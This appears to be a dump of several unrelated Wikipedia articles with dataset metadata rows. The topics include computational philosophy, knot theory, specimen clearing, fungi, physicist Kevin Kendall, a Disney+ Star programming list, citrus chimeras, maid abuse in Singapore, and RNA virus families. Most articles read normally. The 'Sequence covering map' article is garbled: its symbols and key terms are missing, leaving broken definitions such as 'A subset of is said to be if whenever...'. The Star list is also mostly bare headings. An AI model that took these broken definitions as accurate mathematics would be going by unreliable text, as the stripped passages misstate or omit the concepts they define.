Taxonomic impediment
References
Further references
Genetics organizations
DNA barcoding
Metagenomics | Metabarcoding | [
"Biology"
] | 6,228 | [
"Genetics techniques",
"Phylogenetics",
"Molecular genetics",
"DNA barcoding"
] |
66,620,086 | https://en.wikipedia.org/wiki/Computational%20philosophy | Computational philosophy or digital philosophy is the use of computational techniques in philosophy. It includes concepts such as computational models, algorithms, simulations, games, etc. that help in the research and teaching of philosophical concepts, as well as specialized online encyclopedias and graphical visualizations of relationships among philosophers and concepts. The use of computers in philosophy has gained momentum as computer power and the availability of data have increased greatly. This, along with the development of many new techniques that use those computers and data, has opened many new ways of doing philosophy that were not available before. It has also led to new insights in philosophy.
See also
Internet Encyclopedia of Philosophy
PhilPapers
Stanford Encyclopedia of Philosophy
References
External links
Centre for Digital Philosophy at the University of Western Ontario
PhiloComp.net at the University of Oxford
Philosophical methodology
Computational fields of study | Computational philosophy | [
"Technology"
] | 165 | [
"Computational fields of study",
"Computing and society"
] |
66,623,943 | https://en.wikipedia.org/wiki/Murasugi%20sum | In knot theory, a Murasugi sum is a way of combining the Seifert surfaces of two knots or links, given with embeddings in space of each knot and of a Seifert surface for each knot, to produce another Seifert surface of another knot or link. It was introduced by Kunio Murasugi, who used it to compute the genus and Alexander polynomials of certain alternating knots. When the two given Seifert surfaces have the minimum genus for their knot, the same is true for their Murasugi sum. However, the genus of non-minimal-genus Seifert surfaces does not behave as predictably under Murasugi sums.
References
Knot operations | Murasugi sum | [
"Mathematics"
] | 147 | [
"Topology stubs",
"Topology"
] |
66,624,528 | https://en.wikipedia.org/wiki/Diaphonization | Diaphonization (or diaphonisation), also known as clearing and staining, is a staining technique used on animal specimens that first renders the body of the animal transparent by bathing it in trypsin, and then stains the bones and cartilage with various dyes, usually alizarin red and alcian blue.
History
Diaphonization was first developed by O. Schultze in 1897 and was later modified by numerous researchers.
Technique
Clearing renders the animals transparent and is achieved by bathing the specimens in a soup of trypsin, a digestive enzyme that slowly breaks down flesh. The dyes alizarin red and alcian blue are most commonly used in the staining of bone and cartilage, respectively. When cleared, the specimen is put in glycerin. Despite its merits, diaphonization is not widely used in the scientific field. Advancements in imaging technology have rendered the practice all but obsolete, though it is expanding as an art form.
Diaphonization is not suitable for animals longer than 30 centimeters (except for snakes) due to the limited ability of the trypsin bath to penetrate the tissues of larger animals. It is usually used to preserve animals that are too delicate to dissect, and instead are kept as wet specimens.
References
Staining
Staining dyes
Scientific techniques
Laboratory techniques
Zoology
Skeletal system | Diaphonization | [
"Chemistry",
"Biology"
] | 278 | [
"Staining",
"Microbiology techniques",
"Zoology",
"nan",
"Microscopy",
"Cell imaging"
] |
66,628,588 | https://en.wikipedia.org/wiki/Phellinus%20lundellii | Phellinus lundellii is a species of fungus belonging to the family Hymenochaetaceae. It is found in Eurasia and North America.
References
lundellii
Fungi described in 1972
Fungi of Asia
Fungi of Europe
Fungi of North America
Fungus species | Phellinus lundellii | [
"Biology"
] | 54 | [
"Fungi",
"Fungus species"
] |
66,628,662 | https://en.wikipedia.org/wiki/Porodaedalea%20chrysoloma | Porodaedalea chrysoloma is a species of fungus belonging to the family Hymenochaetaceae. It is distributed across central Europe, also found in the south of Sweden, Norway and Finland.
P. chrysoloma can be found parasitizing Norway spruce, typically on the branches. It is considered a key species of old-growth boreal forests.
In Sweden, P. chrysoloma is classified as near threatened in the Swedish Red List due to the loss of its habitat.
Porodaedalea abietis (also known as Porodaedalea laricis) is a sister species of Porodaedalea chrysoloma. Their main morphological difference lies in the hymenium pores: P. chrysoloma has elongated, daedaleoid to labyrinthine, irregular pores, while P. abietis has more regular, cylindrical pores with some elongated ones.
References
Hymenochaetaceae
Fungus species | Porodaedalea chrysoloma | [
"Biology"
] | 205 | [
"Fungi",
"Fungus species"
] |
66,628,903 | https://en.wikipedia.org/wiki/Scotinosphaera%20paradoxa | Scotinosphaera paradoxa is a species of alga belonging to the family Scotinosphaeraceae.
Synonym:
Kentrosphaera facciolaae Borzì, 1883
References
Ulvophyceae | Scotinosphaera paradoxa | [
"Biology"
] | 48 | [
"Algae stubs",
"Algae"
] |
66,631,533 | https://en.wikipedia.org/wiki/Kevin%20Kendall | Kevin Kendall FRS is a British physicist who received a London external BSc degree at Salford CAT in 1965 while working as an engineering apprentice at Joseph Lucas Gas Turbine Ltd. He became interested in surface science during his Ph.D. study in the Cavendish Laboratory and devised a novel method for measuring the true contact area between solids using an ultrasonic transmission. That led to new arguments about the adhesion of contacting solids, giving a theory of adhesion and fracture that applies to a wide range of problems of high industrial significance, especially in the chemical industry where fine particles stick together tenaciously. His book Crack Control published by Elsevier summarizes many of these applications.
Education
Kendall first went to school at St Edwards Darwen but when his mother Margaret died in 1950 the family moved to Accrington near his father Cyril's work at Joseph Lucas Gas Turbine Ltd. On passing the eleven plus exam at St Annes Accrington in 1955 he studied at St. Mary's College, Blackburn, completing his A levels in 1961. Cyril died in 1960 so Joseph Lucas offered Kevin a student apprenticeship in Physics at Salford CAT. His external degree followed in 1965, allowing him to do one year of R&D work on rocket modelling before leaving for Pembroke College Cambridge in October 1966. Three years of study at the Cavendish Laboratory in Free School Lane was successful in analyzing the transmission of ultrasonic waves through metal and other contacts. He received his Doctor of Philosophy from the University of Cambridge in 1970 under the supervision of David Tabor.
Career
In 1969, Kendall joined British Railways Research on London Road, Derby where the new Advanced Passenger Train (APT) was being developed, requiring industrial development of wheel-to-rail adhesion and corrosion problems. While studying the adhesion of nano-particles generated from corroding iron brake-block dust, he found that the standard pull-off testing methods gave large errors and published his first paper to show that crack theory must be used to analyze these adhesion measurements just as Griffith had postulated for glass-cracks in 1920. This coincided with a collaboration linking Ken Johnson and Alan Roberts in the Engineering Department at Cambridge University on the adhesion of elastic spheres. Roberts had performed experiments on the contact and surface attraction of optically smooth rubber spheres during his doctoral studies, while Johnson had solved the stress field problem twelve years earlier. But Johnson had not applied Griffith's energy-equilibrium condition. Kendall produced the mathematical answer in a couple of hours on 11 April 1970, fitting the experimental results reasonably well. The joint paper was published in 1971, one of the most highly cited papers in Royal Society Proceedings A.
This breakthrough in understanding adhesion problems allowed Kendall to take four years out of industry, first at Monash University as a QEII fellow from 1972 and then at Akron University during 1975, supervised by Alan Gent, who co-founded the Adhesion Society in the USA in 1978 because of the widening applications of adhesive and composite materials. It was during this period from 1972 to 1975 that Kendall solved several long-standing problems of composite materials:
Why are composites like fiberglass tougher than their brittle components, e.g. glass and polymer?
How does a crack deflect along a brittle interface?
Why does the strength of a lap joint not exist as a fixed quantity? Lap joints have been known for 5,000 years, but the solution to lap failure was only found in 1975.
The difficulty of industry R&D is that there is no time between inventing, patenting, and commercializing to analyze the science properly, so it was not until 1997, when Kendall took a sabbatical in Australia, that he found the opportunity to summarize these findings in his first book, 'The Sticky Universe'. Unfortunately, misapprehensions, errors, and anachronisms in science last for centuries, and there has been little change in engineering courses and ASTM standards in this millennium to correct faulty fracture textbooks, as recounted at recent conferences demonstrating that the 'strength of brittle materials' always varies with the size of the samples being tested and so has little meaning, overriding Galileo's original definition from 1638.
Kendall believed that industry was the main source of technological advancement and joined the Colloid & Interface Science Group at Imperial Chemical Industries (ICI) in Runcorn to invent new processes and materials. Several patents arose from his new process for mixing cement, using about 1% of polymer additive to make a novel low porosity product with ten times the strength of standard mortar and five times the toughness. This eventually led to improved ceramic processing giving better superconductors and fuel cells among numerous other applications. He and the ICI group received the Ambrose Congreve award for this invention because the energy crisis was intense and new low energy materials and processing were needed.
Another discovery in the 1970s was the limit of grinding fine particles in ball mills, a phenomenon that has been observed for millennia. When grinding limestone in a mill, the particles are reduced in size to a few micrometers, then go no finer. This limit was explained by studying cracks in smaller samples until the crack would fail to extend because plastic flow intervened.
Kendall was awarded the Adhesion Society award for excellence in 1998.
He returned to the industry after starting the spin-out company Adelan in 1996 and is CTO since 2021. The mission is to replace combustion with hydrogen-fuel-cell power generation to avoid climate crisis.
Research in Universities
In 1989, when ICI decided to focus its business on pharmaceuticals and drop its research in carbon fibers and other advanced materials, Kendall took early retirement and joined his long-time colleague Derek Birchall at Keele University, collaborating with the ceramics institution Ceram Research from 1993. The patents on ceramic processing were used to develop new products, especially solid oxide fuel cells (SOFCs), a market expected to grow to $1.4 bn by 2025. Kendall's invention of fine cell tubes allowed rapid start-up and led to many academic papers and two highly cited books. Kendall moved to the University of Birmingham in 2000 and built a substantial group in Chemical Engineering working on hydrogen and fuel cells. He and his colleagues, Prof. Bruno Georges Pollet and Dr Waldemar Bujalski, opened the first UK green-hydrogen station, refueling five fuel-cell-battery taxis, in 2008. Since retiring from teaching in 2011 he has continued to encourage city and industry leadership in clean-energy transport, not achievable by academics alone, linking with Asia, where the growing car population, nearing 1 billion, is a pressing problem. He was the first to show that a hydrogen fuel cell vehicle used 50% less energy than a comparable combustion car. Meanwhile, Kendall was applying his adhesion ideas to cancer cells, viruses, and nano-particles. According to Google Scholar, his works have been cited more than 27,000 times, unusual for an industrial researcher.
He was elected Fellow of the Royal Society in 1993. He continues to push forward the green hydrogen revolution, running a fleet of hydrogen-fuel-cell battery vehicles in the Birmingham Clean Air Zone.
References
External links
A public lecture by Prof. Kevin Kendall from University of Birmingham, UK
Fellows of the Royal Society
British mechanical engineers
Tribologists
Alumni of the University of Cambridge
Living people
Year of birth missing (living people) | Kevin Kendall | [
"Materials_science"
] | 1,470 | [
"Tribology",
"Tribologists"
] |
66,631,602 | https://en.wikipedia.org/wiki/List%20of%20Star%20%28Disney%2B%29%20original%20programming | Star is a hub within the Disney+ streaming service for television and film content intended for a general audience. The hub is available in a subset of countries where Disney+ operates. Programs released exclusively on Star are branded as "Star Originals". Content from Disney-owned networks such as Hulu, ABC and FX, along with other Disney-owned programming premiere exclusively on Star internationally. Star also produces original local content which is exclusively released on the platform.
Original programming
Drama
Comedy
Unscripted
Docuseries
Non-English language
Dutch
French
German
Italian
Japanese
Korean
Mandarin
Portuguese
Spanish
Turkish
Co-productions
Continuations
Original films
Feature films
Documentaries
Specials
Shorts
Exclusive international distribution
TV series
Drama
Comedy
Animation
Adult animation
Anime
Kids & family
Unscripted
Docuseries
Reality
Variety
Continuations
Non-English language
Indonesian
Japanese
Korean
Portuguese
Spanish
Other
Films
Feature films
Documentaries
Specials
Upcoming programming
Original programming
Drama
Unscripted
Docuseries
Non-English language
German
Japanese
Korean
Portuguese
Spanish
Other
Co-productions
Original films
Feature films
Documentaries
Exclusive international distribution
Drama
Comedy
See also
List of Hulu original programming
List of Hulu original films
List of Disney+ original programming
List of Disney+ original films
List of Star+ original programming, for the streaming service in Latin America
List of Disney+ Hotstar original programming, for the streaming service in India and Southeast Asia
List of Disney+ Hotstar original films
Notes
References
Internet-related lists
Lists of television series by network
Lists of television series by streaming service
Television lists
Lists of films by studio | List of Star (Disney+) original programming | [
"Technology"
] | 293 | [
"Computing-related lists",
"Internet-related lists"
] |
66,631,894 | https://en.wikipedia.org/wiki/Kinkoji%20unshiu | Kinkoji unshiu (Citrus obovoidea × unshiu) is a Citrus hybrid cultivated for its edible fruit.
Genetics
Kinkoji unshiu is a graft chimera between the kinkoji (Citrus obovoidea) and the satsuma mandarin (Citrus unshiu).
Distribution
It is cultivated and occurs naturally in Japan and is also grown in California.
Description
The fruit is moderately large (around the size of a grapefruit) and pomelo-like in shape. The rind is of a medium thickness (slightly thinner than that of a pomelo) and is pale to dark yellow in color. The flesh is bright orange in color and moderately seedy. The tree is densely branched and the leaves are leathery and ovate to elliptical in shape. The flesh is juicy and has been described as having a pleasant, though rather mild and flat, flavor. It has been cultivated for over 70 years.
See also
Kobayashi mikan
Japanese citrus
List of citrus fruits
References
Citrus
Citrus hybrids
Fruit trees
Edible fruits
Japanese fruit
Fruits originating in East Asia
Flora of Japan
Graft chimeras | Kinkoji unshiu | [
"Biology"
] | 230 | [
"Chimerism",
"Graft chimeras"
] |
66,634,027 | https://en.wikipedia.org/wiki/Kobayashi%20mikan | Kobayashi mikan (Citrus natsudaidai × unshiu) is a Citrus hybrid cultivated for its edible fruit.
Genetics
Kobayashi mikan is a graft chimera between an amanatsu (Citrus natsudaidai) and a satsuma mandarin (Citrus unshiu).
Distribution
It is cultivated and occurs naturally in Japan and is also grown in California.
Description
The fruit is small to medium in size and oblate to round in shape. The rind is mostly smooth but is normally slightly rough and is medium to bright orange in color. The flesh is dark orange and moderately seedy. The flavor is said to be tart. The tree is densely branched and has a broad crown, and the leaves are elliptical in shape. It has been cultivated for over 70 years.
See also
Kinkoji unshiu
Japanese citrus
List of citrus fruits
References
Citrus
Citrus hybrids
Fruit trees
Edible fruits
Japanese fruit
Fruits originating in East Asia
Oranges (fruit)
Graft chimeras | Kobayashi mikan | [
"Biology"
] | 201 | [
"Chimerism",
"Graft chimeras"
] |
66,634,066 | https://en.wikipedia.org/wiki/Chara%20baueri | Chara baueri is a species of alga belonging to the family Characeae.
It has almost cosmopolitan distribution.
References
Charophyta | Chara baueri | [
"Biology"
] | 30 | [
"Algae stubs",
"Algae"
] |
66,634,139 | https://en.wikipedia.org/wiki/Auriculariopsis%20albomellea | Auriculariopsis albomellea is a species of fungus belonging to the family Schizophyllaceae.
It is native to Eurasia.
References
Schizophyllaceae
Fungus species | Auriculariopsis albomellea | [
"Biology"
] | 43 | [
"Fungi",
"Fungus species"
] |
66,635,300 | https://en.wikipedia.org/wiki/Jennifer%20Burney | Jennifer Burney grew up in Albuquerque, New Mexico, and is now professor and the Marshall Saunders Chancellor's Endowed Chair in Global Climate Policy and Research at the University of California, San Diego, as part of the School of Global Policy and Strategy. She studied history and science at Harvard University and earned a PhD in physics from Stanford, developing a superconducting camera to capture images of cosmic bodies, like pulsars or exoplanets. After graduating, she worked for Solar Electric Light Fund on rural electrification, particularly in West Africa.
She worked as a postdoc at Stanford, starting in 2008, on food security and the environment. She was named a National Geographic Emerging Explorer in 2011. She is a research affiliate at the University of California, San Diego's Policy Design and Evaluation Laboratory, where her research focuses mainly on global food security, adaptation, and climate change mitigation. Projects she has worked on include rural electrification, aerosol emissions, and high-yield farming.
Her partner is Claire Adida, professor of political science at the University of California, San Diego. They have two children.
References
External links
21st-century American women scientists
Living people
21st-century American physicists
American LGBTQ academics
American LGBTQ scientists
LGBTQ people from California
Environmental scientists
Stanford University alumni
University of California, San Diego faculty
Harvard College alumni
Year of birth missing (living people)
LGBTQ physicists | Jennifer Burney | [
"Environmental_science"
] | 285 | [
"American environmental scientists",
"Environmental scientists"
] |
66,638,383 | https://en.wikipedia.org/wiki/Sequence%20covering%20map | In mathematics, specifically topology, a sequence covering map is any of a class of maps between topological spaces whose definitions all somehow relate sequences in the codomain with sequences in the domain. Examples include maps, , , and . These classes of maps are closely related to sequential spaces. If the domain and/or codomain have certain additional topological properties (often, the spaces being Hausdorff and first-countable is more than enough) then these definitions become equivalent to other well-known classes of maps, such as open maps or quotient maps, for example. In these situations, characterizations of such properties in terms of convergent sequences might provide benefits similar to those provided by, say for instance, the characterization of continuity in terms of sequential continuity or the characterization of compactness in terms of sequential compactness (whenever such characterizations hold).
Definitions
Preliminaries
A subset of is said to be if whenever a sequence in converges (in ) to some point that belongs to then that sequence is necessarily in (i.e. at most finitely many points in the sequence do not belong to ). The set of all sequentially open subsets of forms a topology on that is finer than 's given topology
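Because the inline symbols did not survive extraction, here is a minimal LaTeX restatement of the standard definition, with notation supplied as an assumption ($X$ the space, $S \subseteq X$ the subset):

```latex
% Standard definition of a sequentially open set (notation supplied):
S \subseteq X \text{ is sequentially open} \iff
\forall (x_n)_{n \in \mathbb{N}} \text{ in } X,\;
\bigl( x_n \to x \text{ with } x \in S \bigr) \implies
\exists N \;\forall n \ge N :\; x_n \in S .
```

That is, any sequence converging to a point of $S$ must eventually lie in $S$; this matches the prose definition above.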
By definition, is called a if
Given a sequence in and a point in if and only if in Moreover, is the topology on for which this characterization of sequence convergence in holds.
A map is called if is continuous, which happens if and only if for every sequence in and every if in then necessarily in
Every continuous map is sequentially continuous although in general, the converse may fail to hold.
In fact, a space is a sequential space if and only if it has the following :
for every topological space and every map the map is continuous if and only if it is sequentially continuous.
The in of a subset is the set consisting of all for which there exists a sequence in that converges to in
A subset is called in if which happens if and only if whenever a sequence in converges in to some point then necessarily
The space is called a if for every subset which happens if and only if every subspace of is a sequential space.
Every first-countable space is a Fréchet–Urysohn space and thus also a sequential space. All pseudometrizable spaces, metrizable spaces, and second-countable spaces are first-countable.
Sequence coverings
A sequence in a set is by definition a function whose value at is denoted by (although the usual notation used with functions, such as parentheses or composition might be used in certain situations to improve readability).
Statements such as "the sequence is injective" or "the image (i.e. range) of a sequence is infinite" as well as other terminology and notation that is defined for functions can thus be applied to sequences.
A sequence is said to be a of another sequence if there exists a strictly increasing map (possibly denoted by instead) such that for every where this condition can be expressed in terms of function composition as:
As usual, if is declared to be (such as by definition) a subsequence of then it should immediately be assumed that is strictly increasing.
The notation and mean that the sequence is valued in the set
The function is called a if for every convergent sequence in there exists a sequence such that
It is called a if for every there exists some such that every sequence that converges to in there exists a sequence such that and converges to in
It is a if is surjective and also for every and every every sequence and converges to in there exists a sequence such that and converges to in
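The first of these, the sequence covering property, admits a compact standard formulation; the notation $f : X \to Y$ below is supplied here as an assumption, since the symbols do not appear in the text:

```latex
% Standard formulation of a sequence covering map (notation assumed):
f : X \to Y \text{ is a sequence covering} \iff
\text{for every } y_n \to y \text{ in } Y \text{ there exist }
x_n , x \in X \text{ with } f(x_n) = y_n ,\; f(x) = y ,\; x_n \to x .
```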
A map is a if for every compact there exists some compact subset such that
Sequentially quotient mappings
In analogy with the definition of sequential continuity, a map is called a if
is a quotient map, which happens if and only if for any subset is sequentially open if and only if this is true of in
Sequentially quotient maps were introduced in who defined them as above.
Every sequentially quotient map is necessarily surjective and sequentially continuous although they may fail to be continuous.
If is a sequentially continuous surjection whose domain is a sequential space, then is a quotient map if and only if is a sequential space and is a sequentially quotient map.
Call a space if is a Hausdorff space.
In an analogous manner, a "sequential version" of every other separation axiom can be defined in terms of whether or not the space possess it.
Every Hausdorff space is necessarily sequentially Hausdorff. A sequential space is Hausdorff if and only if it is sequentially Hausdorff.
If is a sequentially continuous surjection then assuming that is sequentially Hausdorff, the following are equivalent:
is sequentially quotient.
Whenever is a convergent sequence in then there exists a convergent sequence in such that and is a subsequence of
Whenever is a convergent sequence in then there exists a convergent sequence in such that is a subsequence of
This statement differs from (2) above only in that there are no requirements placed on the limits of the sequences (which becomes an important difference only when is not sequentially Hausdorff).
If is a continuous surjection onto a sequentially compact space then this condition holds even if is not sequentially Hausdorff.
If the assumption that is sequentially Hausdorff were to be removed, then statement (2) would still imply the other two statement but the above characterization would no longer be guaranteed to hold (however, if points in the codomain were required to be sequentially closed then any sequentially quotient map would necessarily satisfy condition (3)).
This remains true even if the sequential continuity requirement on was strengthened to require (ordinary) continuity.
Instead of using the original definition, some authors define "sequentially quotient map" to mean a surjection that satisfies condition (2) or alternatively, condition (3). If the codomain is sequentially Hausdorff then these definitions differs from the original in the added requirement of continuity (rather than merely requiring sequential continuity).
The map is called if for every convergent sequence in such that is not eventually equal to the set is sequentially closed in where this set may also be described as:
Equivalently, is presequential if and only if for every convergent sequence in such that the set is sequentially closed in
A surjective map between Hausdorff spaces is sequentially quotient if and only if it is sequentially continuous and a presequential map.
Characterizations
If is a continuous surjection between two first-countable Hausdorff spaces then the following statements are true:
is almost open if and only if it is a 1-sequence covering.
An is surjective map with the property that for every there exists some such that is a for which by definition means that for every open neighborhood of is a neighborhood of in
is an open map if and only if it is a 2-sequence covering.
If is a compact covering map then is a quotient map.
The following are equivalent:
is a quotient map.
is a sequentially quotient map.
is a sequence covering.
is a pseudo-open map.
A map is called if for every and every open neighborhood of (meaning an open subset such that ), necessarily belongs to the interior (taken in ) of
and if in addition both and are separable metric spaces then to this list may be appended:
is a hereditarily quotient map.
Properties
The following is a sufficient condition for a continuous surjection to be sequentially open, which with additional assumptions, results in a characterization of open maps. Assume that is a continuous surjection from a regular space onto a Hausdorff space If the restriction is sequentially quotient for every open subset of then maps open subsets of to sequentially open subsets of
Consequently, if and are also sequential spaces, then is an open map if and only if is sequentially quotient (or equivalently, quotient) for every open subset of
Given an element in the codomain of a (not necessarily surjective) continuous function the following gives a sufficient condition for to belong to 's image: A family of subsets of a topological space is said to be at a point if there exists some open neighborhood of such that the set is finite.
Assume that is a continuous map between two Hausdorff first-countable spaces and let
If there exists a sequence in such that (1) and (2) there exists some such that is locally finite at then
The converse is true if there is no point at which is locally constant; that is, if there does not exist any non-empty open subset of on which restricts to a constant map.
Sufficient conditions
Suppose is a continuous open surjection from a first-countable space onto a Hausdorff space let be any non-empty subset, and let where denotes the closure of in
Then given any and any sequence in that converges to there exists a sequence in that converges to as well as a subsequence of such that for all
In short, this states that given a convergent sequence such that then for any other belonging to the same fiber as it is always possible to find a subsequence such that can be "lifted" by to a sequence that converges to
The following shows that under certain conditions, a map's fiber being a countable set is enough to guarantee the existence of a point of openness. If is a sequence covering from a Hausdorff sequential space onto a Hausdorff first-countable space and if is such that the fiber is a countable set, then there exists some such that is a point of openness for
Consequently, if is quotient map between two Hausdorff first-countable spaces and if every fiber of is countable, then is an almost open map and consequently, also a 1-sequence covering.
See also
Notes
Citations
References
Topological graph theory | Sequence covering map | [
"Mathematics"
] | 2,078 | [
"Mathematical relations",
"Topological graph theory",
"Topology",
"Graph theory"
] |
68,131,375 | https://en.wikipedia.org/wiki/Maid%20abuse | Maid abuse is the maltreatment or neglect of a person hired as a domestic worker, especially by the employer or by a household member of the employer. It is any act or failure to act that results in harm to that employee. It takes on numerous forms, including physical, sexual, emotional, and economic abuse. The majority of perpetrators tend to be female employers and their children. These acts may be committed for a variety of reasons, including to instil fear in the victim, discipline them, or act in a way desired by the abuser.
The United States Human Trafficking Hotline describes maid abuse as a form of human trafficking— it is "force, fraud, or coercion to maintain control over the worker and to cause the worker to believe that he or she has no other choice but to continue with the work," they stated. Although it can occur anywhere, it is most commonly experienced amongst domestic workers in Singapore.
Prevalence
Maid abuse, though a global phenomenon, is especially prevalent in Singapore. According to a study by Research Across Borders, six out of ten Singaporean domestic workers experience some form of abuse at work. One in four reported physical violence. Additionally, one in seven Singaporeans have witnessed maid abuse.
Foreign domestic workers, who have come to the country seeking employment, are at high risk of abuse. As maids are the only migrant workers not protected under Singapore's Employment Act, many end up in abusive situations. This is amplified by the fact that foreign domestic worker contracts in Singapore lack live-out options; foreign maids reside in the same residence as their employers. Mistreatment of foreign domestic workers in Singapore is not uncommon and is widely documented. They are subject to physical abuse, invasion of privacy, and sexual assault (including rape).
Legislation
Singapore
In Singapore, it is against the law to abuse a foreign domestic worker. The Ministry of Manpower (MOM) says that perpetrators face severe penalties; if convicted, the perpetrator may face prison time, caning, or be fined as much as $20,000. The perpetrator will also be banned from further employment of foreign domestic workers.
Malaysia
In Malaysia, abused foreign domestic workers can obtain visas so that they may stay in the country to pursue legal complaints; the same is true in the United States.
Notable cases
On 2 December 2001, 19-year-old Indonesian maid Muawanatul Chasanah was found beaten to death in her house of employment in Chai Chee, Singapore. Her employer, Ng Hua Chye, was arrested and charged with her murder. It was revealed in Ng's 2-day trial that Ng had repeatedly punched, kicked and whipped the maid and even used burning cigarette butts and/or boiling hot water to burn the maid due to her supposed poor working performance and her stealing the food of Ng's infant daughter. He was sentenced to 18 years and six months in prison, along with 12 strokes of the cane.
On 28 May 2002, Indonesian maid Sundarti Supriyanto killed her employer Angie Ng and Ng's daughter Crystal Poh, and set fire to Ng's Bukit Merah office in Singapore. Sundarti recounted that she was severely abused by Ng for minor mistakes, and even starved for days by Ng. She had endured much humiliation before she finally lost her control and fatally stabbed Ng (and her daughter) in a frenzied attack. The High Court of Singapore accepted that she indeed suffered from maid abuse and was not of her right mind when she was gravely provoked into committing the crime and lost control; therefore they acquitted Sundarti of murder and instead sentenced her to life imprisonment for culpable homicide not amounting to murder.
On 26 July 2016, in Singapore, Myanmar maid Piang Ngaih Don was killed by her employer, 41-year-old Gaiyathiri Murugayan. Murugayan was sentenced to 30 years in prison on 22 June 2021. She had earlier pleaded guilty to 28 charges out of a total of 115 relating to the murder and abuse of the maid, who had worked for her family for a few months. The murder charge was reduced to the next highest charge of culpable homicide because Gaiyathiri was suffering from a mental disorder at the time she killed Piang, meaning she would not be sentenced to death (which was the mandatory penalty for murder in Singapore). The prosecution sought a life sentence for the convicted maid killer, and while judge See Kee Oon did not hand down a life term, he agreed that Gaiyathiri's conduct was an abhorrence and an outrage to human and public conscience. Gaiyathiri's mother was given a 17-year jail term for maid abuse, while Gaiyathiri's husband, who also abused the maid, has been on trial since 2023.
On 25 June 2018, at a flat in Singapore's Choa Chu Kang, 17-year-old Zin Mar Nwe, a foreign maid from Myanmar, used a knife to stab her employer's mother-in-law 26 times, resulting in the death of the 70-year-old elderly Indian citizen. Zin Mar Nwe told police and the court that the victim had hit and reprimanded her on several occasions, and that the threat of being sent back to her home country triggered her to stab the elderly woman to death. Although Zin Mar Nwe was nonetheless found guilty of murder at the end of her trial on 18 May 2023, the trial court accepted some of her claims of being abused by the victim. She was sentenced to life imprisonment in July 2023.
See also
Domestic worker
References
Abuse
Crimes
Violence against women | Maid abuse | [
"Biology"
] | 1,166 | [
"Abuse",
"Behavior",
"Aggression",
"Human behavior"
] |
68,132,184 | https://en.wikipedia.org/wiki/Atkinsviridae | Atkinsviridae is a family of RNA viruses that infect prokaryotes.
Taxonomy
Atkinsviridae contains 56 genera:
Andhevirus
Apihcavirus
Arihsbuvirus
Bahdevuvirus
Bilifuvirus
Blinduvirus
Cahtebovirus
Chinihovirus
Chounavirus
Cihsnivirus
Diydovirus
Dugnivirus
Firunevirus
Gohshovirus
Hehspivirus
Helacdivirus
Hirvovirus
Huhmpluvirus
Huleruivirus
Hysdruvirus
Ichonovirus
Ipivevirus
Isoihlovirus
Kempsvovirus
Kihrivirus
Kimihcavirus
Kudohovirus
Kuhfotivirus
Lahcomavirus
Lehptevirus
Lobdovirus
Madisduvirus
Mitdiwavirus
Moloevirus
Monekavirus
Nehujevirus
Neratovirus
Niginuvirus
Pagohnivirus
Pihngevirus
Pohlydovirus
Psoetuvirus
Qeihnovirus
Rainacovirus
Scloravirus
Sdonativirus
Sdribtuvirus
Shopitevirus
Stupavirus
Tsecebavirus
Wahbolevirus
Wecineivirus
Whodehavirus
Wulosvivirus
Yekorevirus
Yeshinuvirus
References
Virus families
Riboviria | Atkinsviridae | [
"Biology"
] | 254 | [
"Virus stubs",
"Viruses",
"Riboviria"
] |
68,132,216 | https://en.wikipedia.org/wiki/Solspiviridae | Solspiviridae is a family of RNA viruses that infect prokaryotes.
Taxonomy
Solspiviridae contains 24 genera:
Alohrdovirus
Andihavirus
Dibaevirus
Dilzevirus
Eosonovirus
Etdyvivirus
Fahrmivirus
Hinehbovirus
Insbruvirus
Intasivirus
Jargovirus
Mahshuvirus
Mintinovirus
Odiravirus
Oekfovirus
Puhrivirus
Puirovirus
Sexopuavirus
Thiuhmevirus
Tohkunevirus
Tyrahlevirus
Vendavirus
Voulevirus
Wishivirus
References
Virus families
Riboviria | Solspiviridae | [
"Biology"
] | 128 | [
"Virus stubs",
"Viruses",
"Riboviria"
] |
68,132,262 | https://en.wikipedia.org/wiki/Steitzviridae | Steitzviridae is a family of RNA viruses that infect prokaryotes.
Taxonomy
Steitzviridae contains 117 genera:
Abakapovirus
Achlievirus
Adahmuvirus
Alehxovirus
Aphenovirus
Arawsmovirus
Arctuvirus
Arpirivirus
Ashcevirus
Bahnicevirus
Belbovirus
Berdovirus
Bicehmovirus
Bidhavirus
Brikhyavirus
Cahrlavirus
Cahtavirus
Catindovirus
Cebevirus
Chlurivirus
Chorovirus
Clitovirus
Cohrdavirus
Controvirus
Cunarovirus
Dohnjavirus
Endehruvirus
Eregrovirus
Erimutivirus
Fagihovirus
Fejonovirus
Ferahgovirus
Fluruvirus
Frobavirus
Fudhoevirus
Gahmegovirus
Garnievirus
Gehrmavirus
Gernuduvirus
Gihfavirus
Gredihovirus
Gulmivirus
Hahkesevirus
Henifovirus
Hohltdevirus
Hohrdovirus
Huhbevirus
Huohcivirus
Huylevirus
Hyjrovirus
Hylipavirus
Iwahcevirus
Jiforsuvirus
Kecijavirus
Kecuhnavirus
Kehruavirus
Kihsiravirus
Kinglevirus
Kyanivirus
Laimuvirus
Lazuovirus
Lehptavirus
Lihvevirus
Limaivirus
Lomnativirus
Loptevirus
Luloavirus
Lygehevirus
Lyndovirus
Mahdsavirus
Mahjnavirus
Metsavirus
Milihnovirus
Minusuvirus
Mocruvirus
Molucevirus
Nehumivirus
Nihlwovirus
Ociwvivirus
Pahspavirus
Patimovirus
Pepusduvirus
Phulihavirus
Pirifovirus
Podtsbuvirus
Pohlodivirus
Psiaduvirus
Psouhdivirus
Puduphavirus
Pujohnavirus
Rodtovirus
Rohsdrivirus
Sdenfavirus
Setohruvirus
Sidiruavirus
Snuwdevirus
Sperdavirus
Stehnavirus
Suhnsivirus
Surghavirus
Tamanovirus
Tehmuvirus
Tehnicivirus
Thehlovirus
Thyrsuvirus
Tikiyavirus
Timirovirus
Tsuhreavirus
Tuskovirus
Tuwendivirus
Vernevirus
Vesehyavirus
Vindevirus
Weheuvirus
Widsokivirus
Yeziwivirus
Zuysuivirus
References
Virus families
Riboviria | Steitzviridae | [
"Biology"
] | 496 | [
"Virus stubs",
"Viruses",
"Riboviria"
] |